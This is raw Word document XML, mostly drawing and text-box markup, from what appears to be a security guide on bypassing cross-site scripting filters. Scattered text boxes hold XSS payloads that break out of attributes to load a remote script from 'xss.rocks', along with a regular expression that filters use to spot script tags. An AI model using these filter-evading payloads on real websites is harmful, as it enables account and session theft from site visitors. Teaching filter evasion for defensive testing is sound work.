                              <a:gd name="T10" fmla="+- 0 422 240"/>
                              <a:gd name="T11" fmla="*/ 422 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4460"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4460"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4460"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4460"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6052 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4460"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6073 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4460"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6073 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4460"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6055 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4460"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6052 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4460"/>
                              <a:gd name="T46" fmla="+- 0 422 240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460" h="183">
                                <a:moveTo>
                                  <a:pt x="443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438" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4459" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4459" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4441" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44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Text Box 59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39"/>
                            <a:ext cx="446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0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="&gt;"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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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6" o:spid="_x0000_s1833" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:223pt;height:9.15pt;z-index:-15590400;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="446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">
                <v:shape id="Freeform 598" o:spid="_x0000_s1834" style="position:absolute;left:1614;top:239;width:4460;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="446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s6VMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPwWrDMBBE74X8g9hCb43cQJ3UtRxCSiHHOs6hx8Xa&#10;WKbWylhKYvvro0Khx2Fm3jD5drSduNLgW8cKXpYJCOLa6ZYbBafq83kDwgdkjZ1jUjCRh22xeMgx&#10;0+7GJV2PoRERwj5DBSaEPpPS14Ys+qXriaN3doPFEOXQSD3gLcJtJ1dJkkqLLccFgz3tDdU/x4tV&#10;cKZNs+YdmXX9XX6d5vBRTXpW6ulx3L2DCDSG//Bf+6AVvL6l8HsmHgFZ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7OlTEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m4438,182l21,182r-3,l,161r,-3l,21,21,,4438,r21,21l4459,161r-18,21l4438,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4438,422;21,422;18,422;0,401;0,398;0,261;21,240;4438,240;4459,261;4459,401;4441,422;4438,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 597" o:spid="_x0000_s1835" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:446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LwBcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxUKupq4goFAQxpoceX7PP&#10;ZDH7Ns1uNf57Vyh4HGbmG2a+7GwtLtR641jBeJSAIC6cNlwq+Mq3wykIH5A11o5JwY08LBf93hxT&#10;7a6c0eUYShEh7FNUUIXQpFL6oiKLfuQa4uidXGsxRNmWUrd4jXBby9ckmUiLhuNChQ2tKyrOxz+r&#10;YPXN2cb87n8O2SkzeT5LeDc5K/Uy6FYfIAJ14Rn+b39qBW+z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vAF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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="60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="&gt;"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="61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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102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2659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226060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1891665" cy="123190"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="592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1665" cy="123190"/>
                          <a:chOff x="1614" y="356"/>
                          <a:chExt cx="2979" cy="194"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="593" name="Freeform 595"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="363"/>
                            <a:ext cx="2941" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4534 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2941"/>
                              <a:gd name="T2" fmla="+- 0 546 363"/>
                              <a:gd name="T3" fmla="*/ 546 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2941"/>
                              <a:gd name="T6" fmla="+- 0 546 363"/>
                              <a:gd name="T7" fmla="*/ 546 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2941"/>
                              <a:gd name="T10" fmla="+- 0 545 363"/>
                              <a:gd name="T11" fmla="*/ 545 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2941"/>
                              <a:gd name="T14" fmla="+- 0 525 363"/>
                              <a:gd name="T15" fmla="*/ 525 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2941"/>
                              <a:gd name="T18" fmla="+- 0 521 363"/>
                              <a:gd name="T19" fmla="*/ 521 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2941"/>
                              <a:gd name="T22" fmla="+- 0 384 363"/>
                              <a:gd name="T23" fmla="*/ 384 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2941"/>
                              <a:gd name="T26" fmla="+- 0 363 363"/>
                              <a:gd name="T27" fmla="*/ 363 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4534 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2941"/>
                              <a:gd name="T30" fmla="+- 0 363 363"/>
                              <a:gd name="T31" fmla="*/ 363 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4555 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2941"/>
                              <a:gd name="T34" fmla="+- 0 384 363"/>
                              <a:gd name="T35" fmla="*/ 384 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4555 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2941"/>
                              <a:gd name="T38" fmla="+- 0 525 363"/>
                              <a:gd name="T39" fmla="*/ 525 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4537 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2941"/>
                              <a:gd name="T42" fmla="+- 0 545 363"/>
                              <a:gd name="T43" fmla="*/ 545 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4534 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2941"/>
                              <a:gd name="T46" fmla="+- 0 546 363"/>
                              <a:gd name="T47" fmla="*/ 54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941" h="183">
                                <a:moveTo>
                                  <a:pt x="292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920" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2941" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2941" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2923" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="292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Text Box 594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355"/>
                            <a:ext cx="2979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1"/>
                                <w:ind w:left="3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[^'"\&gt;\\s\]+))?)+\\s\*|\\s\*)src/i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3" o:spid="_x0000_s1836" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:17.8pt;width:148.95pt;height:9.7pt;z-index:-15589888;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,356" coordsize="2979,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">
                <v:shape id="Freeform 595" o:spid="_x0000_s1837" style="position:absolute;left:1614;top:363;width:2941;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="294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DhbMcA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUvDQBSE70L/w/IKvdlNLZYauy2lKIh4qI1Qj8/s&#10;M4nNvo27mzT5992C4HGYmW+Y1aY3tejI+cqygtk0AUGcW11xoeAje75dgvABWWNtmRQM5GGzHt2s&#10;MNX2zO/UHUIhIoR9igrKEJpUSp+XZNBPbUMcvW/rDIYoXSG1w3OEm1reJclCGqw4LpTY0K6k/HRo&#10;jYLfz7bLh2w4LrP66av9eTu61z0rNRn320cQgfrwH/5rv2gF9w9zuJ6JR0Cu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w4WzHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m2920,183l21,183r-3,-1l,162r,-4l,21,21,,2920,r21,21l2941,162r-18,20l2920,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2920,546;21,546;18,545;0,525;0,521;0,384;21,363;2920,363;2941,384;2941,525;2923,545;2920,546" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 594" o:spid="_x0000_s1838" type="#_x0000_t202" style="position:absolute;left:1614;top:355;width:2979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Bucs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kbTD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YG5y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1"/>
                          <w:ind w:left="36"/>
                          <w:rPr>
                            <w:sz w:val="16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[^'"\&gt;\\s\]+))?)+\\s\*|\\s\*)src/i</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="1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2710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508635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3040380" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="589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0380" cy="116205"/>
                          <a:chOff x="1614" y="801"/>
                          <a:chExt cx="4788" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="590" name="Freeform 592"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="800"/>
                            <a:ext cx="4788" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6380 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4788"/>
                              <a:gd name="T2" fmla="+- 0 983 801"/>
                              <a:gd name="T3" fmla="*/ 983 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4788"/>
                              <a:gd name="T6" fmla="+- 0 983 801"/>
                              <a:gd name="T7" fmla="*/ 983 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4788"/>
                              <a:gd name="T10" fmla="+- 0 982 801"/>
                              <a:gd name="T11" fmla="*/ 982 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4788"/>
                              <a:gd name="T14" fmla="+- 0 962 801"/>
                              <a:gd name="T15" fmla="*/ 962 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4788"/>
                              <a:gd name="T18" fmla="+- 0 959 801"/>
                              <a:gd name="T19" fmla="*/ 959 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4788"/>
                              <a:gd name="T22" fmla="+- 0 822 801"/>
                              <a:gd name="T23" fmla="*/ 822 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4788"/>
                              <a:gd name="T26" fmla="+- 0 801 801"/>
                              <a:gd name="T27" fmla="*/ 801 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6380 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4788"/>
                              <a:gd name="T30" fmla="+- 0 801 801"/>
                              <a:gd name="T31" fmla="*/ 801 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6401 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4788"/>
                              <a:gd name="T34" fmla="+- 0 822 801"/>
                              <a:gd name="T35" fmla="*/ 822 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6401 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4788"/>
                              <a:gd name="T38" fmla="+- 0 962 801"/>
                              <a:gd name="T39" fmla="*/ 962 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6384 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4788"/>
                              <a:gd name="T42" fmla="+- 0 982 801"/>
                              <a:gd name="T43" fmla="*/ 982 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6380 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4788"/>
                              <a:gd name="T46" fmla="+- 0 983 801"/>
                              <a:gd name="T47" fmla="*/ 98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88" h="183">
                                <a:moveTo>
                                  <a:pt x="476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766" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4787" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4787" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4770" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="476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Text Box 591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800"/>
                            <a:ext cx="478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7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a="&gt;"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''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httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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0" o:spid="_x0000_s1839" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:40.05pt;width:239.4pt;height:9.15pt;z-index:-15589376;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,801" coordsize="4788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">
                <v:shape id="Freeform 592" o:spid="_x0000_s1840" style="position:absolute;left:1614;top:800;width:4788;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="478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wm68IA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/6HMIIXqVkLit0apVgFtUWoLUJvw2a6&#10;uzSZLEnU9d+bg+Dx8b5ni9YacSYfascKRsMMBHHhdM2lgp/v9dMURIjIGo1jUnClAIt5tzPDXLsL&#10;f9H5EEuRQjjkqKCKscmlDEVFFsPQNcSJ+3PeYkzQl1J7vKRwa+Rzlk2kxZpTQ4UNLSsq/g8nq+Cj&#10;8dvj7zvj3uyOAxs+V8aGlVL9Xvv2CiJSGx/iu3ujFYxf0vx0Jh0B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fCbrwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m4766,182l21,182r-3,-1l,161r,-3l,21,21,,4766,r21,21l4787,161r-17,20l4766,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4766,983;21,983;18,982;0,962;0,959;0,822;21,801;4766,801;4787,822;4787,962;4770,982;4766,983" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 591" o:spid="_x0000_s1841" type="#_x0000_t202" style="position:absolute;left:1614;top:800;width:4788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fN6sUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvelGoWJSV5GiIBSkMR56fM0+&#10;k8Xs25hdNf33bkHwOMzMN8x82dtGXKnzxrGC8SgBQVw6bbhScCg2wxkIH5A1No5JwR95WC5eBnPM&#10;tLtxTtd9qESEsM9QQR1Cm0npy5os+pFriaN3dJ3FEGVXSd3hLcJtIydJMpUWDceFGlv6rKk87S9W&#10;weqH87U5736/82NuiiJN+Gt6UurttV99gAjUh2f40d5qBe/pG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F83q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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="47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a="&gt;"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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''</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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74048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2768600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2877820" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="586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7820" cy="116205"/>
                          <a:chOff x="4360" y="108"/>
                          <a:chExt cx="4532" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="587" name="Freeform 589"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4360" y="108"/>
                            <a:ext cx="4532" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8871 4360"/>
                              <a:gd name="T1" fmla="*/ T0 w 4532"/>
                              <a:gd name="T2" fmla="+- 0 290 108"/>
                              <a:gd name="T3" fmla="*/ 290 h 183"/>
                              <a:gd name="T4" fmla="+- 0 4381 4360"/>
                              <a:gd name="T5" fmla="*/ T4 w 4532"/>
                              <a:gd name="T6" fmla="+- 0 290 108"/>
                              <a:gd name="T7" fmla="*/ 290 h 183"/>
                              <a:gd name="T8" fmla="+- 0 4378 4360"/>
                              <a:gd name="T9" fmla="*/ T8 w 4532"/>
                              <a:gd name="T10" fmla="+- 0 290 108"/>
                              <a:gd name="T11" fmla="*/ 290 h 183"/>
                              <a:gd name="T12" fmla="+- 0 4360 4360"/>
                              <a:gd name="T13" fmla="*/ T12 w 4532"/>
                              <a:gd name="T14" fmla="+- 0 269 108"/>
                              <a:gd name="T15" fmla="*/ 269 h 183"/>
                              <a:gd name="T16" fmla="+- 0 4360 4360"/>
                              <a:gd name="T17" fmla="*/ T16 w 4532"/>
                              <a:gd name="T18" fmla="+- 0 266 108"/>
                              <a:gd name="T19" fmla="*/ 266 h 183"/>
                              <a:gd name="T20" fmla="+- 0 4360 4360"/>
                              <a:gd name="T21" fmla="*/ T20 w 4532"/>
                              <a:gd name="T22" fmla="+- 0 129 108"/>
                              <a:gd name="T23" fmla="*/ 129 h 183"/>
                              <a:gd name="T24" fmla="+- 0 4381 4360"/>
                              <a:gd name="T25" fmla="*/ T24 w 4532"/>
                              <a:gd name="T26" fmla="+- 0 108 108"/>
                              <a:gd name="T27" fmla="*/ 108 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8871 4360"/>
                              <a:gd name="T29" fmla="*/ T28 w 4532"/>
                              <a:gd name="T30" fmla="+- 0 108 108"/>
                              <a:gd name="T31" fmla="*/ 108 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8892 4360"/>
                              <a:gd name="T33" fmla="*/ T32 w 4532"/>
                              <a:gd name="T34" fmla="+- 0 129 108"/>
                              <a:gd name="T35" fmla="*/ 129 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8892 4360"/>
                              <a:gd name="T37" fmla="*/ T36 w 4532"/>
                              <a:gd name="T38" fmla="+- 0 269 108"/>
                              <a:gd name="T39" fmla="*/ 269 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8874 4360"/>
                              <a:gd name="T41" fmla="*/ T40 w 4532"/>
                              <a:gd name="T42" fmla="+- 0 290 108"/>
                              <a:gd name="T43" fmla="*/ 290 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8871 4360"/>
                              <a:gd name="T45" fmla="*/ T44 w 4532"/>
                              <a:gd name="T46" fmla="+- 0 290 108"/>
                              <a:gd name="T47" fmla="*/ 29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32" h="183">
                                <a:moveTo>
                                  <a:pt x="451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511" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4532" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4532" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4514" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="451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Text Box 588"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4360" y="108"/>
                            <a:ext cx="45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2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/\&lt;script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\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7" o:spid="_x0000_s1842" style="position:absolute;left:0;text-align:left;margin-left:218pt;margin-top:5.4pt;width:226.6pt;height:9.15pt;z-index:15874048;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="4360,108" coordsize="453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">
                <v:shape id="Freeform 589" o:spid="_x0000_s1843" style="position:absolute;left:4360;top:108;width:4532;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="453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GC68MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE74LfITzBm6YqaqlGEaVs9+gfEG+P5tkW&#10;m5fSRO1++83CgsdhZn7DrLedqcWLWldZVjAZRyCIc6srLhRczukoBuE8ssbaMin4IQfbTb+3xkTb&#10;Nx/pdfKFCBB2CSoovW8SKV1ekkE3tg1x8O62NeiDbAupW3wHuKnlNIoW0mDFYaHEhvYl5Y/T0yj4&#10;Lo5VnB7S23w2PWR7ebVfpsmUGg663QqEp85/wv/tTCuYx0v4OxOO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cGC68MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m4511,182l21,182r-3,l,161r,-3l,21,21,,4511,r21,21l4532,161r-18,21l4511,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4511,290;21,290;18,290;0,269;0,266;0,129;21,108;4511,108;4532,129;4532,269;4514,290;4511,290" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 588" o:spid="_x0000_s1844" type="#_x0000_t202" style="position:absolute;left:4360;top:108;width:453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TyqsEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwix401RB0WoUWVwQBLHWwx5nm7EN&#10;NpNuk9X6781B8Ph438t1Z2txo9YbxwpGwwQEceG04VLBOf8ezED4gKyxdkwKHuRhvfroLTHV7s4Z&#10;3U6hFDGEfYoKqhCaVEpfVGTRD11DHLmLay2GCNtS6hbvMdzWcpwkU2nRcGyosKGviorr6d8q2Pxw&#10;tjV/h99jdslMns8T3k+vSvU/u80CRKAuvMUv904rmMz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08qrBAAAA3A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2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/\&lt;script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\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Another</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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evade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filter,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pP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GvdeMetni"/>
        <w:spacing w:before="101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74560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2930525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2886075" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="583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6075" cy="116205"/>
                          <a:chOff x="4615" y="107"/>
                          <a:chExt cx="4545" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="584" name="Freeform 586"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4615" y="107"/>
                            <a:ext cx="4545" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 9138 4615"/>
                              <a:gd name="T1" fmla="*/ T0 w 4545"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 4637 4615"/>
                              <a:gd name="T5" fmla="*/ T4 w 4545"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 4633 4615"/>
                              <a:gd name="T9" fmla="*/ T8 w 4545"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 4615 4615"/>
                              <a:gd name="T13" fmla="*/ T12 w 4545"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 4615 4615"/>
                              <a:gd name="T17" fmla="*/ T16 w 4545"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 4615 4615"/>
                              <a:gd name="T21" fmla="*/ T20 w 4545"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 4637 4615"/>
                              <a:gd name="T25" fmla="*/ T24 w 4545"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 9138 4615"/>
                              <a:gd name="T29" fmla="*/ T28 w 4545"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 9160 4615"/>
                              <a:gd name="T33" fmla="*/ T32 w 4545"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 9160 4615"/>
                              <a:gd name="T37" fmla="*/ T36 w 4545"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 9142 4615"/>
                              <a:gd name="T41" fmla="*/ T40 w 4545"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
